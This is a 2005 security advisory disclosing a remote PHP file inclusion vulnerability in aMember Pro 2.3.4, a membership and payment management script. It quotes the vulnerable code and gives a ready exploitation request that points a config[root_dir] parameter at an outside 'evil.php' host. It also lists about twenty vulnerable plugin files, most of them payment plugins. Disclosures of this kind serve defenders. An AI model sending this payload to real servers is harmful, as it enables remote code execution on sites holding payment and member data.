[NewAngels Advisory #2] aMember Pro 2.3.X - Remote File Include Vulnerability ============================================================================= Software: aMember Pro 2.3.4 Type: Remote PHP File Include Vulnerability Risk: High Date: Aug. 16 2005 Vendor: CGI Central Credit: ======= NewAngels Team with special note of 4Degrees. Description: ============ "aMember is a flexible membership and subscription management PHP script. It has support for PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, Multicards, E-Gold and Clickbank payment systems (complete list can be found here) and allows you to setup paid-membership areas on your site. It can also be used without any payment system - you can manage users manually." [http://www.amember.com/] PHP Requirements: ================= register_globals = On Vulnerability: ============== Source: >global $config; >[...] >require_once($config['root_dir']."...somestring..."); Exploitation: ============= This vulnerability exists in several files, the code is not exactly the same in all files. But the exploit does remain the same. Example: http://www.somesite.com/aMember/plugins/db/mysql/mysql.inc.php POST: config[root_dir]=http://www.46and2.com/evil.php? Vulnerable Files: /aMember/plugins/db/mysql/mysql.inc.php /aMember/plugins/payment/efsnet/efsnet.inc.php /aMember/plugins/payment/theinternetcommerce/theinternetcommerce.inc.php /aMember/plugins/payment/cdg/cdg.inc.php /aMember/plugins/payment/compuworld/compuworld.inc.php /aMember/plugins/payment/directone/directone.inc.php /aMember/plugins/payment/authorize_aim/authorize_aim.inc.php /aMember/plugins/payment/beanstream/beanstream.inc.php /aMember/plugins/payment/echo/config.inc.php /aMember/plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php /aMember/plugins/payment/eway/eway.inc.php /aMember/plugins/payment/linkpoint/linkpoint.inc.php /aMember/plugins/payment/logiccommerce/logiccommerce.inc.php /aMember/plugins/payment/netbilling/netbilling.inc.php /aMember/plugins/payment/payflow_pro/payflow_pro.inc.php /aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php /aMember/plugins/payment/payos/payos.inc.php /aMember/plugins/payment/payready/payready.inc.php /aMember/plugins/payment/plugnplay/plugnplay.inc.php